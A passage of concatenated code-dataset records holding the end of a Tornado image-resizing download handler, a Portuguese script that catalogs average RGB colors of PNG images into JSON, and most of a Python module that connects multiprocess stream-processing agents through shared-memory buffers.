img.height]\n\n if (bscale == True):\n if (img.width * 75 >= img.height * 100): # 宽度大, 变y\n x = cwidth\n y = (img.height * cwidth) / img.width\n else:\n x = (img.width * cheight) / img.height\n y = cheight\n else:\n x = cwidth\n y = cheight\n\n img = img.resize((int(x), int(y)))\n if (img.mode != \"RGB\"):\n img = img.convert(\"RGB\")\n\n outstream = io.BytesIO()\n img.save(outstream, \"JPEG\")\n outstream.flush()\n return outstream\n\n\nif __name__ == '__main__':\n asyncioloop = asyncio.get_event_loop()\n AsyncIOMainLoop().install()\n tornadoinstance = tornado.ioloop.IOLoop.instance()\n\n app = tornado.web.Application([\n (r'/test', download_Handler),\n ])\n app.listen(3000)\n\n asyncioloop.run_forever()\n","sub_path":"tiger_python_tools/pg_filedownload.py","file_name":"pg_filedownload.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528631694","text":"#ele vai pegar uma pasta, e criar um json nela, listando a media de cores de cada imagem na pasta\r\n#e juntar todas essas informacoes em um catalogo. funcoes que ele contem\r\n#uma que vai pegar uma pasta inteira para listar todas as imagem, checar se ja tem um catalogo\r\n#outra para remover item da lista, junto com seu arquivo\r\n#e adicionar item na mao mesmo se quiser\r\n'''\r\nestrutura catalogo\r\n\r\ndict gigante??\r\n{\r\n \"padrao_imagens\" : [120, 120, \"RGB\"]\r\n \"arquivo1.png\" : (123, 221, 24),\r\n \"arquivo2.png\" : (151, 172, 38)\r\n}\r\n\r\n'''\r\n\r\nimport sys, os\r\nfrom PIL import Image\r\nfrom getopt import getopt, GetoptError \r\nimport json\r\nimport numpy as np\r\nimport re\r\n\r\ncaminho = \"assets/texturaMinecraft\"\r\n#'all' para pasta toda, 'rem' para remover arquivos e 'add' para adicionar arquivos\r\nmodo = 'all'\r\n\r\ndef carregar_catalogo():\r\n try:\r\n with open(\"_catalogo.json\", \"r\") as obj:\r\n catalogo = json.load(obj)\r\n except:\r\n return definir_catalogo()\r\n\r\ndef salvar_catalogo(catalogo):\r\n with open(\"_catalogo.json\", \"w\") as obj:\r\n json.dump(catalogo, obj)\r\n\r\ndef cores_medias_imagemRGB(PIL_imagem):\r\n pixels = np.array(PIL_imagem)\r\n soma_pixels_RGB = pixels.sum(1)\r\n\r\n soma_pixels_canal_R = soma_pixels_RGB[:, 0].sum()\r\n soma_pixels_canal_G = soma_pixels_RGB[:, 1].sum()\r\n soma_pixels_canal_B = soma_pixels_RGB[:, 2].sum()\r\n\r\n imagem_quant_pixels = PIL_imagem.height * PIL_imagem.width\r\n\r\n media_canal_R = soma_pixels_canal_R // imagem_quant_pixels\r\n media_canal_G = soma_pixels_canal_G // imagem_quant_pixels\r\n media_canal_B = soma_pixels_canal_B // imagem_quant_pixels\r\n\r\n return [int(media_canal_R), int(media_canal_G), int(media_canal_B)]\r\n\r\ndef definir_catalogo():\r\n print(\"ora bolar, percebo que nao tienes uno cataloguito\")\r\n print(\"pero joy possy ajhudalo, so me ajuder a te ajudar\")\r\n\r\n while True:\r\n tamanho_raw = input(\"qual o tamanho das imagens[ex: 100l 100a]: \").strip()\r\n if not input(\"tem certeza?: Y/N\") in [\"N\", \"n\", \"pero que no\"]:\r\n try:\r\n largura, altura = tamanho_raw.split(\" \")\r\n largura, altura = int(largura), int(altura)\r\n except:\r\n print(\"escreveru merda ai >:(\")\r\n continue\r\n break\r\n\r\n while True:\r\n cores = input('e qual o padrao de cores [ex: RGB ou PB]: ').strip()\r\n if input(\"tem certeza?: Y/N\") not in [\"N\", \"n\", \"pero que no\"]:\r\n if cores not in [\"RGB\", 'PB', 'rgb', 'pb', 'r', 'p']:\r\n print(\"entrou uma cor errada ai otario\")\r\n continue\r\n break\r\n\r\n catalogo = 
{'padrao_imagens' : [largura, altura, cores]}\r\n return catalogo\r\n\r\ndef add_img_catalogo(catalogo, nome_imagem, cores_imagem):\r\n catalogo.update({nome_imagem : cores_imagem})\r\n\r\n#pega os parametros pela linha de comando\r\nif(len(sys.argv) > 1):\r\n try:\r\n opts, args = getopt(sys.argv[1:],\"p:o:\")\r\n except GetoptError:\r\n print(\"algum argumento invalido\")\r\n sys.exit(2)\r\n\r\n for opt, arg in opts:\r\n if opt == '-p':\r\n caminho = arg\r\n elif opt == '-o':\r\n modo = arg\r\n\r\nif modo == 'all':\r\n #adiciona todas as imagens na pasta para um catalogo\r\n #o catalogo pode ou não já existir\r\n try:\r\n os.chdir(caminho)\r\n except FileNotFoundError:\r\n raise Exception(f'O caminho \"{caminho}\" nao e valido')\r\n\r\n imagens = [f for f in os.listdir() if f[-4:] == \".png\"]\r\n\r\n catalogo = carregar_catalogo()\r\n\r\n for nome_imagem in imagens:\r\n if nome_imagem not in catalogo:\r\n imagem = Image.open(nome_imagem)\r\n medias_imagem = cores_medias_imagemRGB(imagem)\r\n add_img_catalogo(catalogo, nome_imagem, medias_imagem)\r\n\r\n salvar_catalogo(catalogo)\r\n\r\n\r\nelif modo == 'rem':\r\n #remove uma imagem do catalogo dependendo procurando pelo nome dela\r\n pass\r\nelif modo == 'add':\r\n #adiciona uma ou mais imagens no catalogo\r\n pass\r\nelse:\r\n print(\"modo invalido\")\r\n \r\n\r\n","sub_path":"python/listador.py","file_name":"listador.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"114764976","text":"\"\"\"\nThis module makes processes for a multicore application.\nIt uses multiprocessing.Array to enable multiple processes to\nshare access to streams efficiently.\n\"\"\"\nimport sys\nimport os\n# Check whether the Python version is 2.x or 3.x\n# If it is 2.x import Queue. If 3.x then import queue.\nis_py2 = sys.version[0] == '2'\nif is_py2:\n import Queue as queue\nelse:\n import queue as queue\n\nimport multiprocessing\n# multiprocessing.Array provides shared memory that can\n# be shared across processes.\nimport threading\nimport time\nsys.path.append(os.path.abspath(\"../agent_types\"))\nsys.path.append(os.path.abspath(\"../core\"))\nsys.path.append(os.path.abspath(\"../helper_functions\"))\n\n# sink, op are in the agent_types folder\nfrom sink import stream_to_queue, sink_list, sink_element\nfrom op import map_element, map_list\n# compute_engine, stream are in the core folder\nfrom compute_engine import ComputeEngine\nfrom stream import Stream\n# basics is in the helper_functions folder\nfrom basics import map_e, fmap_e, map_l, f_mul\nfrom print_stream import print_stream\n# utils is in the current folder\nfrom utils import check_processes_connections_format, check_connections_validity\n\n# BUFFER_SIZE is the default length of each buffer.\nBUFFER_SIZE = 2**20\n# MAX_NUM_SOURCES is the maximum number of sources in a multicore application.\nMAX_NUM_SOURCES = 10\nMAX_NUM_PROCESSES = 8\n\n#-----------------------------------------------------------------------\nclass Proc(object):\n \"\"\"\n Proc creates a process in a multicore application.\n\n Parameters\n ----------\n spec: dict\n spec is a specification of a process.\n The keywords of spec are the following strings.\n 'in_stream_names_types'\n 'out_stream_names_types'\n 'compute_func'\n 'keyword_args'\n 'sources'\n 'actuators'\n The keyword 'compute_func' is required. 
The other keywords\n of spec can be omitted in which case a default value is used.\n connections: dict\n connections specifies the connection of an output stream of a\n process to the input stream of the same or another process.\n name: str\n Every process must have a unique name.\n\n Attributes\n ----------\n in_stream_names_types : list\n in_stream_names_types is a list of pairs where each pair is\n (in_stream name, in_stream_type). An in_stream_type is a\n str defined in multiprocessing.Array. For example 'i' stands\n for int.\n The order of the pairs must correspond to the order of\n in_streams in compute_func.\n Example of in_stream_names_types = [('in', 'i')]\n which says that the compute function (compute_func) has a\n single input stream called 'in' which is of type int.\n Default: empty list\n out_stream_names_types : list\n Similar to in_stream_names_types.\n Example of out_stream_names_types = [('out', 'i')]\n which says that the compute function (compute_func) has a\n single input stream called 'out' which is of type int.\n Default: empty list\n compute_func: function\n The main thread of this process executes compute_func which\n creates a network of agents and runs the agents.\n compute_func is the function that carries out computation for\n this agent. compute_func(in_streams, out_streams) creates a\n network of agents.\n in_streams must correspond to in_stream_names_types.\n out_streams must correspond to out_stream_names_types.\n The thread that executes compute_func is started by starting\n stream.scheduler (see core/ComputeEngine.py).\n keyword_args: dict\n The keys of this dict are the keyword arguments of the\n function, compute_func. The value corresponding to a key\n is the CONSTANT value for the corresponding keyword argument.\n Example: {'ADDEND' :10} where ADDEND is a keyword argument of\n compute_func, and this keyword argument has value 10.\n Default: empty dict.\n sources: dict\n The keys of sources are names of sources. The value corresponding\n to a key is a description of the source. This description is\n also a dict with two keys: The type of data produced by the source\n and the function that generates the data. This function runs in\n its own thread.\n Example of sources:\n {'acceleration':\n {'type': 'i',\n 'func': source_thread_target\n }\n This process has a single source called 'acceleration' which uses\n the function source_thread_target to generate int data.\n Default: empty dict\n out_to_in: dict\n The keys are out_stream names of this process, and the\n values are lists.\n out_to_in[out_stream_name] is a list of pairs:\n (receiver_process_name, in_stream_name)\n where the out_stream called out_stream_name of this process\n is connected to the in_stream called in_stream_name in the\n receiver process called receiver_process_name.\n Example of self.out_to_in:\n {'out': [('aggregate_and_output_process', 'in')],\n 'acceleration': [('get_source_data_and_compute_process', 'in')]\n }\n The output stream called 'out' of this process is connected to\n an input stream called 'in' of the process called\n 'aggregate_and_output_process'.\n The output stream called 'acceleration' of this process is connected to\n an input stream called 'in' of the process called\n 'get_source_data_and_compute_process'.\n in_to_out: dict\n The keys are in_stream_names of this process and the values are\n pairs (out_process_name, out_stream_name).\n Example of self. 
in_to_out:\n {\n 'in': ('get_source_data_and_compute_process', 'acceleration')\n }\n This process has an input stream called 'in' connected to an\n output stream called 'acceleration' in the process called\n 'get_source_data_and_compute_process'\n The output stream may be an output of compute_func or an\n a source.\n \n\n Notes\n -----\n Examples of spec and connections are at the end of this file.\n See TEST.\n\n \"\"\"\n def __init__(self, spec, connections, name):\n self.spec = spec\n # Connections is a dict that specifies connections from outputs of\n # processes or sources to inputs of other processes.\n self.connections = connections\n self.name = name\n # in_stream_names_types is a list of in_stream names and their types.\n if 'in_stream_names_types' in self.spec:\n self.in_stream_names_types = self.spec['in_stream_names_types']\n else:\n self.in_stream_names_types = []\n # out_stream_names_types is a list of out_stream names and their types.\n if 'out_stream_names_types' in self.spec:\n self.out_stream_names_types = self.spec['out_stream_names_types']\n else:\n self.out_stream_names_types = []\n self.compute_func = self.spec['compute_func']\n if 'keyword_args' in self.spec:\n self.keyword_args = self.spec['keyword_args']\n else:\n self.keyword_args = {}\n if 'sources' in self.spec:\n self.sources = self.spec['sources']\n else:\n self.sources = {}\n self.source_keyword_args = {}\n if 'actuators' in self.spec:\n self.actuators = self.spec['actuators']\n else:\n self.actuators = {}\n self.out_to_in = self.connections[self.name]\n # out_to_buffer[out_stream_name] is (buffer, buffer_ptr) which is\n # the buffer to which this out_stream_name or source_name is connected.\n # Next, compute out_to_buffer.\n self.out_to_buffer = {}\n # create a buffer for each out_stream and each source of this process.\n # 1. Create a buffer for each out_stream of this process.\n # self.out_to_buffer[out_stream_name] becomes the buffer for the stream called\n # out_stream_name.\n # self.out_stream_names_types is a list of pairs:\n # ( out_stream_name, out_stream_type)\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n if out_stream_type != 'x':\n buffer = multiprocessing.Array(out_stream_type, BUFFER_SIZE)\n # buffer_ptr is an integer with initial value of 0.\n buffer_ptr = multiprocessing.Value('i', 0)\n \n else:\n # TO DO: use the scheduler queues to send data from this output stream\n # to the inpute streams to which it is connected.\n pass\n self.out_to_buffer[out_stream_name] = (buffer, buffer_ptr)\n \n # 2. Create a buffer for each source of this process.\n # self.out_to_buffer[source_name] is the buffer for the source called\n # source_name\n for source_name, source_type_and_func in self.sources.items():\n source_type = source_type_and_func['type']\n if source_type != 'x':\n # This source generates data of a type accepted by\n # multiprocessing.Array\n buffer = multiprocessing.Array(source_type, BUFFER_SIZE)\n # buffer_ptr is a shared integer with initial value of 0.\n buffer_ptr = multiprocessing.Value('i', 0)\n else:\n # This source feeds a stream inside the same process in\n # which the source thread runs. This source does not feed\n # any other process. 
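                # A minimal sketch of the shared-buffer pair created above
                # (illustrative values; 'i' is the int type code, as in the
                # docstring examples):
                #     buffer = multiprocessing.Array('i', BUFFER_SIZE)  # shared slots
                #     buffer_ptr = multiprocessing.Value('i', 0)        # shared write index
                #     buffer[buffer_ptr.value] = 42   # visible to every process
                #     buffer_ptr.value += 1
                # Each buffer here has a single writing process (the owner of the
                # out_stream or source), so buffer writes need no extra locking;
                # main_lock below guards only the queue/source status bookkeeping.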
So, it does not need to use\n # multiprocessing.Array.\n # This source can generate arbitrary Python objects such as\n # tuples.\n buffer_ptr = 0\n buffer = [0] * BUFFER_SIZE\n self.out_to_buffer[source_name] = (buffer, buffer_ptr)\n\n # out_to_q_and_in_stream_signal_names[out_stream_name] is \n # a list of pairs (q, in_stream_signal_name).\n # where q is the queue of the receiving process and\n # in_stream_signal_name is 's_signal_' if the in_stream is 's'.\n # make_out_to_q_and_in_stream_signal_names() is the function\n # that fills in out_to_q_and_in_stream_signal_names.\n self.out_to_q_and_in_stream_signal_names = {}\n # in_queue is the input queue of this process.\n self.in_queue = multiprocessing.Queue()\n # process is created from the process specification and\n # connections. It is obtained by the function make_process().\n self.process = None\n # in_to_out[in_stream_name] is a pair:\n # (sender_process_name, out_stream_name)\n # in_to_out is filled in by the function\n # make_in_to_out()\n self.in_to_out = {}\n # in_to_buffer[in_stream_name] is a buffer. Data in this buffer\n # is copied into this in_stream.\n # in_to_buffer is computed by the function make_in_to_out().\n self.in_to_buffer = {}\n # Set by calling multicore\n self.process_ids = {}\n self.source_ids = {}\n self.source_status = {}\n self.queue_status = {}\n self.all_process_specs = {}\n self.all_procs = {}\n # main_lock is the lock acquired to do operations on\n # in_queue of processes. These operations check whether the\n # queues are empty. Empty queues are used to detect termination.\n self.main_lock = None\n return\n\n def make_in_to_out(self, procs, connections):\n \"\"\"\n Computes self.in_to_out and self.in_to_buffer\n\n Parameters\n ----------\n procs: dict\n procs[proc_name] is an instance of the Proc class\n\n \"\"\"\n for out_process_name, process_connections in connections.items():\n for out_stream_name, stream_connections in process_connections.items():\n for in_process_name, in_stream_name in stream_connections:\n if in_process_name == self.name:\n # The out_stream called out_stream_name in the\n # process called out_process_name is connected\n # to the in_stream called in_stream_name in THIS\n # process.\n self.in_to_out[in_stream_name] = (\n out_process_name, out_stream_name)\n # Get the sending process\n out_process = procs[out_process_name]\n # Get the output buffer in which data from the sending\n # stream is placed.\n out_buffer = out_process.out_to_buffer[out_stream_name]\n self.in_to_buffer[in_stream_name] = out_buffer\n return\n\n def make_out_to_q_and_in_stream_signal_names(self, procs):\n # Create q_and_in_stream_signal_names for each out_stream and\n # each source of this process.\n # 1. Create q_and_in_stream_signal_names for each out_stream of this process.\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n # self.out_to_q_and_in_stream_signal_names[out_stream_name] is\n # q_and_in_stream_signal_names which is a list of pairs:\n # (q, in_stream_signal_name).\n # where q is the queue of the receiving process and\n # in_stream_signal_name is 's_signal_' if the in_stream is\n # 's'. 
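        # A concrete instance of this naming convention, assuming an in_stream
        # named 's' in a receiving process named 'p' (names illustrative):
        #     's_signal_'  is the signal stream paired with 's', and
        #     procs['p'].in_queue receives tuples ('s_signal_', (start, end)).
        # The sender never puts stream data on the queue itself; it enqueues the
        # buffer segment boundaries, and the receiver copies buffer[start:end]
        # into 's' (see copy_buffer_segment below).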
These are the queues and in_stream_signals of the\n # input streams connected to this out_stream.\n self.out_to_q_and_in_stream_signal_names[out_stream_name] = []\n # receivers is a list of pairs (process name, in_stream name)\n receivers = self.out_to_in[out_stream_name]\n for receiver_proc_name, in_stream_name in receivers:\n receiver_proc = procs[receiver_proc_name]\n self.out_to_q_and_in_stream_signal_names[out_stream_name].append(\n (receiver_proc.in_queue, in_stream_name + '_signal_'))\n\n # 2. Create q_and_in_stream_signal_names for each source of this process.\n # self.out_to_q_and_in_stream_signal_names[name] is the\n # q_and_in_stream_signal_names for the connections to the source called\n # name\n for source_name, source_type_and_func in self.sources.items():\n self.out_to_q_and_in_stream_signal_names[source_name] = []\n # receivers is a list of pairs (process name, in_stream name)\n receivers = self.out_to_in[source_name]\n for receiver_proc_name, in_stream_name in receivers:\n # receiver_proc is the Proc with the name, receiver_proc_name.\n receiver_proc = procs[receiver_proc_name]\n # (1) Associate the in_queue of the receiver process with the\n # source called source_name.\n # (2) The messages about new data in the source called source_name\n # are sent to the stream called in_stream_name + '_signal_'\n # in the receiver process.\n self.out_to_q_and_in_stream_signal_names[source_name].append(\n (receiver_proc.in_queue, in_stream_name + '_signal_'))\n return\n\n # Make the process. First define the target() function of the process.\n def make_process(self):\n def target():\n \"\"\"\n This is the target function of this process. This function has the\n following steps:\n 1. Create in_streams of the this process, i.e., the in_streams of\n the compute_func of the process.\n 2. Create in_stream_signals, with an in_stream_signal corresponding\n to each in_stream.\n 3. Create out_streams of this process, i.e. out_streams of the\n compute_func of this process.\n 4. Create the computational agent (compute_func) of this process.\n 5. For each out_stream of compute_func, create an agent to copy the\n out_stream to its buffer, and then copy the buffer to each\n in_stream to which it is connected.\n 6. For each in_stream of compute_func, create an agent to copy its\n input buffer into the in_stream.\n 7. Create the scheduler for this process. Starting the scheduler\n starts the thread that executes compute_func for this agent.\n 8. Create the source threads for each source in this process. The\n source_thread gets data from a source, puts the data into a\n buffer, and then copies the buffer to each in_queue to which the\n source is connected.\n 9. Start the scheduler and source threads.\n 10. 
Join the scheduler and source threads.\n \n \"\"\"\n # STEP 1\n # CREATE THE IN_STREAMS OF COMPUTE_FUNC \n # and compute the dict, name_to_stream.\n # in_streams is the list of in_stream of this process.\n self.in_streams = []\n # name_to_stream is a dict where the key is the name of an\n # input or output stream and the value is the stream itself.\n self.name_to_stream = {}\n for in_stream_name, in_stream_type in self.in_stream_names_types:\n in_stream = Stream(name=in_stream_name)\n self.in_streams.append(in_stream)\n self.name_to_stream[in_stream_name] = in_stream\n\n # STEP 2\n # CREATE IN_STREAM_SIGNALS which is a list of input streams, with\n # one in_stream_signal for each in_stream.\n # in_stream_signal[j] is the stream that tells\n # this process that it has data to be read into\n # in_stream[j]. The name of an in_stream_signal associated with an\n # in_stream called 's' is 's_signal_'.\n self.in_stream_signals = []\n for in_stream in self.in_streams:\n in_stream_signal_name = in_stream.name + '_signal_'\n in_stream_signal = Stream(name=in_stream_signal_name)\n self.in_stream_signals.append(in_stream_signal)\n self.name_to_stream[in_stream_signal_name] = in_stream_signal\n\n # STEP 3\n # CREATE THE OUT_STREAMS FOR COMPUTE_FUNC.\n # out_streams is a list of the output streams of this process.\n self.out_streams = []\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n out_stream = Stream(out_stream_name)\n self.out_streams.append(out_stream)\n self.name_to_stream[out_stream_name] = out_stream\n\n # STEP 4\n # CREATE THE COMPUTE AGENT FOR THIS PROCESS.\n self.compute_func(self.in_streams, self.out_streams, **self.keyword_args)\n\n # STEP 5\n # CREATE AGENTS TO COPY EACH OUT_STREAM OF COMPUTE_FUNC TO IN_STREAMS.\n # Note: Create an agent for each out_stream of compute_func and\n # create an agent for each source. This agent copies the elements\n # in each out_stream into the in_streams to which it is connected.\n # See copy_stream().\n #\n # self.out_stream_names_types is a list of pairs:\n # (out_stream_name, out_stream_type)\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n # STEP 5.1: Get parameters of each agent.\n # Step 5.1.1 Get the out_stream with the specified name.\n out_stream = self.name_to_stream[out_stream_name]\n # Step 5.1.2 Get the buffer and buffer_ptr into which this out_stream\n # is copied.\n buffer, buffer_ptr = self.out_to_buffer[out_stream_name]\n # Step 5.1.3 Get the list of pairs (q, in_stream_signal_name) connected\n # to this out_stream\n q_and_in_stream_signal_names = \\\n self.out_to_q_and_in_stream_signal_names[out_stream_name]\n # STEP 5.2: Make agent that copies out_stream to the in_streams to\n # which it is connected. The input stream to this agent is out_stream.\n # stream_name is a keyword argument of copy_stream().\n sink_list(func=self.copy_stream, in_stream=out_stream,\n stream_name=out_stream_name)\n\n # STEP 6\n # CREATE AGENTS TO COPY BUFFERS TO IN_STREAMS.\n # For each in_stream of this process, create an agent that\n # copies data from the input buffer of this in_stream into\n # the in_stream.\n # This agent subscribes to the in_stream_signal associated\n # with this in_stream. When in_stream_signal gets a message\n # (start, end) this agent copies the buffer segment between\n # start and end into the in_stream.\n # copy_buffer_segment() is the function executed by the agent\n # when a new message arrives. 
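            # A sketch of the fan-out created in STEP 5: for an out_stream 'out'
            # (name illustrative) connected to several processes, the single agent
            #     sink_list(func=self.copy_stream, in_stream=out_stream,
            #               stream_name='out')
            # hands each batch of new elements to copy_stream, which writes the
            # batch into the shared buffer once and then enqueues one small
            # (signal_name, (start, end)) message per receiver, so the data is
            # copied into shared memory only once however many readers there are.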
This function extends out_stream\n # with the segment of the buffer specified by the message.\n for in_stream_name, in_stream_type in self.in_stream_names_types:\n in_stream_signal_name = in_stream_name + '_signal_'\n # Get the in_stream_signal stream from its name.\n in_stream_signal = self.name_to_stream[in_stream_signal_name]\n # Get the in_stream from its name\n in_stream = self.name_to_stream[in_stream_name]\n # Get the buffer that feeds this in_stream.\n buffer, buffer_ptr = self.in_to_buffer[in_stream_name]\n # Create agents\n sink_element(\n func=copy_buffer_segment,\n in_stream=in_stream_signal,\n out_stream=in_stream,\n buffer=buffer, in_stream_type=in_stream_type)\n\n # STEP 7\n # CREATE A NEW STREAM.SCHEDULER FOR THIS PROCESS\n # Specify the scheduler, input_queue and name_to_stream for\n # this processes.\n Stream.scheduler = ComputeEngine(self)\n # input_queue is the queue into which all streams for this\n # process are routed.\n Stream.scheduler.input_queue = self.in_queue\n # The scheduler for a process uses a dict, name_to_stream.\n # name_to_stream[stream_name] is the stream with the name stream_name.\n Stream.scheduler.name_to_stream = self.name_to_stream\n\n # STEP 8\n # CREATE SOURCE_THREADS\n source_threads = []\n for source_name, description in self.sources.items():\n # thread_creation_func returns a thread which\n # gets data from a source with name source_name and then\n # uses self.copy_stream to copy the data into a\n # buffer associated with this source, and\n # informs all in_streams connected to this source that\n # new data has arrived.\n thread_target = description['func']\n if 'keyword_args' in description.keys():\n self.source_keyword_args = description['keyword_args']\n else:\n self.source_keyword_args = {}\n # Get the source_thread for the source with this name.\n #source_thread = thread_creation_func(self.copy_stream, source_name)\n source_thread = self.create_source_thread(thread_target, source_name,\n **self.source_keyword_args)\n source_threads.append(source_thread)\n\n # STEP 9\n # START SOURCE THREADS AND START SCHEDULER.\n # Starting the scheduler starts a thread --- the main thread --- of this\n # process. 
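            # The contract for a source thread target, as create_source_thread
            # below wires it up and as source_thread_target in the TEST section
            # illustrates: the target receives one argument,
            #     this_source = (proc, source_name),
            # and is expected to call
            #     copy_data_to_source(data, this_source)  # push a list of items
            #     source_finished(this_source)            # exactly once, at the end
            # Termination detection (this source's source_status flag dropping
            # to 0) relies on every source eventually calling source_finished.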
The scheduler thread gets a ready agent from the in_queue of\n # this process and then executes the next step of the agent.\n Stream.scheduler.start()\n for source_thread in source_threads:\n source_thread.start()\n\n # STEP 10\n # JOIN SOURCE THREADS AND JOIN SCHEDULER.\n for source_thread in source_threads:\n source_thread.join()\n\n Stream.scheduler.join()\n return\n\n # Create the process.\n self.process = multiprocessing.Process(target=target)\n\n def create_source_thread(self, thread_target, stream_name, **source_keyword_args):\n this_source = (self, stream_name)\n return threading.Thread(target=thread_target,\n args=(this_source,))\n \n def copy_stream(self, lst, stream_name):\n \"\"\"\n Parameters\n ----------\n lst: list\n the sequence of values that are copied to streams connected to this\n stream\n stream_name: str\n The name of the stream that is copied to other streams.\n Notes\n -----\n This is the function called by sink agents to take the following steps:\n STEP 1: Get objects connected to the stream with this name.\n STEP 2: Copy lst into the circular buffer which is the output buffer for\n this stream.\n STEP 3: Put a message into the queue of each process that receives lst.\n This message is put into an in_stream_signal of the receiving\n process.\n STEP 4: Update parameters to get ready for next call to this function.\n\n \"\"\"\n # STEP 1: GET BUFFER, QUEUE, STREAMS CONNECTED TO THIS STREAM\n buffer, buffer_ptr = self.out_to_buffer[stream_name]\n q_and_in_stream_signal_names = \\\n self.out_to_q_and_in_stream_signal_names[stream_name]\n\n # STEP 2: COPY LST INTO THE CIRCULAR BUFFER\n n = len(lst)\n assert n < BUFFER_SIZE, \\\n \"The length of input data is greater than the buffer size\"\n if isinstance(buffer_ptr, int):\n # This buffer is for a local stream.\n # This buffer is a Python list and not multiprocessing.Array\n buffer_end_ptr = buffer_ptr + n\n buffer_current_ptr = buffer_ptr\n else:\n # This buffer uses multiprocessing.Array\n buffer_end_ptr = buffer_ptr.value + n\n buffer_current_ptr = buffer_ptr.value\n if buffer_end_ptr < BUFFER_SIZE:\n # In this case, don't need to wrap around the\n # end of the buffer.\n buffer[buffer_current_ptr : buffer_end_ptr] = lst\n else:\n # In this case, must wrap around the end of\n # the circular buffer.\n # remaining_space is the space remaining from\n # buffer_ptr to the end of the buffer.\n remaining_space = BUFFER_SIZE - buffer_end_ptr\n # Copy remaining_space elements of the list\n # to fill up the buffer.\n buffer[buffer_current_ptr:] = lst[:remaining_space]\n # That leaves n-remaining_space elements of the\n # list that are yet to be copied into the buffer.\n # Copy the remaining elements of list into the\n # buffer starting from slot 0.\n buffer[:n-remaining_space] = lst[remaining_space:]\n buffer_end_ptr = n-remaining_space\n\n # STEP 3: TELL THE RECEIVER PROCESSES THAT THEY HAVE NEW\n # DATA.\n # 1. Set the status of queues that will now get data to\n # 'not empty' or 1.\n # 2. 
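        # A worked wrap-around example with an illustrative BUFFER_SIZE of 8:
        # writing n = 4 items at buffer_current_ptr = 6 gives buffer_end_ptr = 10,
        # so the copy must split as buffer[6:8] = lst[:2] and buffer[:2] = lst[2:],
        # leaving the new pointer at 2. The split point is the space left after
        # the *current* pointer, BUFFER_SIZE - buffer_current_ptr (= 2 here);
        # deriving it from buffer_end_ptr, as the assignment above does, yields a
        # non-positive slice length in this branch and looks like a latent bug.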
Put a message into the queue of each process that\n # receives a copy of lst.\n\n # Always acquire lock for operations on queue_status or\n # source_status\n self.main_lock.acquire()\n # Step 3.1: Set queue status to \"not empty\" for queues that\n # receive this message.\n for receiver in self.out_to_in[stream_name]:\n # The output stream called stream_name is connected to the\n # input stream called in_stream_name in the receiving\n # process called receiver_proc_name.\n receiver_proc_name, in_stream_name = receiver\n receiver_process_id = self.process_ids[receiver_proc_name]\n # queues status is 1 for not empty, 0 for empty.\n self.queue_status[receiver_process_id] = 1\n # Step 3.2: Send a message to the in_stream signal corresponding\n # to each in_stream saying that new data is available\n # in the buffer between pointers:\n # (buffer_ptr.value, buffer_end_ptr)\n for q, in_stream_signal_name in q_and_in_stream_signal_names:\n q.put((in_stream_signal_name, (buffer_current_ptr, buffer_end_ptr)))\n self.main_lock.release()\n\n # STEP 4: UPDATE BUFFER_PTR TO GET READY FOR NEXT INPUT.\n if isinstance(buffer_ptr, int):\n buffer_ptr = buffer_end_ptr\n else:\n buffer_ptr.value = buffer_end_ptr\n return\n def broadcast(self, receiver_stream_name, msg):\n for process_name in self.all_process_specs.keys():\n this_process = self.all_procs[process_name]\n this_process.in_queue.put((receiver_stream_name, msg))\n\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\ndef copy_buffer_segment(message, out_stream, buffer, in_stream_type):\n \"\"\"\n copy_buffer_segment() is the function executed by the agent\n when a new message arrives. A message is (start, end).\n This function extends out_stream with the segment of the buffer\n between start and end.\n \"\"\"\n start, end = message\n if end >= start:\n return_value = buffer[start:end]\n else:\n # The return value is read from the circular buffer\n # by going to the end of the buffer and adding values\n # from the beginning of the buffer.\n remaining_space = BUFFER_SIZE - start\n segment_length = remaining_space + end\n # Set up an array with appropriate length to be filled in later.\n return_value = multiprocessing.Array(in_stream_type, range(segment_length))\n return_value[:remaining_space] = \\\n multiprocessing.Array(in_stream_type, buffer[start:])\n return_value[remaining_space:] = \\\n multiprocessing.Array(in_stream_type, buffer[:end])\n out_stream.extend(list(return_value))\n return\n#-------------------------------------------------------------------\n\ndef copy_data_to_source(data, source):\n \"\"\"\n Function used by source thread targets.\n See source_thread_target in TEST\n\n \"\"\"\n proc, stream_name = source\n proc.copy_stream(data, stream_name)\n\ndef source_finished(source):\n \"\"\"\n Set the source_status of this source to 0 to\n indicate that this source has terminated execution.\n\n Called by source thread functions.\n \"\"\"\n proc, source_name = source\n process_name = proc.name\n this_source_id = proc.source_ids[process_name][source_name]\n proc.source_status[this_source_id] = 0\n proc.broadcast('source_finished', (process_name, source_name))\n \ndef multicore(processes, connections):\n source_status = multiprocessing.Array('B', MAX_NUM_SOURCES)\n queue_status = multiprocessing.Array('B', MAX_NUM_PROCESSES)\n check_processes_connections_format(processes, connections)\n check_connections_validity(processes, connections)\n procs = {}\n # In 
the following name is a process name and\n # spec is the specification of the process.\n for name, spec in processes.items():\n procs[name] = Proc(spec, connections, name)\n # Make the dict relating output streams to queues of receiving\n # processes and to in_stream_signal_names.\n for name in processes.keys():\n procs[name].make_out_to_q_and_in_stream_signal_names(procs)\n # Make the dict relating in_streams of processes to output\n # processes and output streams to which they are connected.\n for name in processes.keys():\n procs[name].make_in_to_out(procs, connections)\n\n # Create source ids and set source_status\n source_id_count=0\n source_ids = {}\n for process_name, spec in processes.items():\n source_ids[process_name] = {}\n sources_dict = spec['sources']\n for source_name in sources_dict.keys():\n source_ids[process_name][source_name] = source_id_count\n source_status[source_id_count] = 1\n source_id_count += 1\n for process_name in processes.keys():\n this_process = procs[process_name]\n this_process.source_ids = source_ids\n this_process.source_status = source_status\n\n #Create main_lock and pass it to all processes.\n main_lock = multiprocessing.Lock()\n # Create process ids and set queue_status\n process_id_count=0\n process_ids = {}\n for process_name in processes.keys():\n process_ids[process_name] = process_id_count\n queue_status[process_id_count] = 1\n process_id_count += 1\n for process_name in processes.keys():\n this_process = procs[process_name]\n this_process.process_ids = process_ids\n this_process.queue_status = queue_status\n this_process.main_lock = 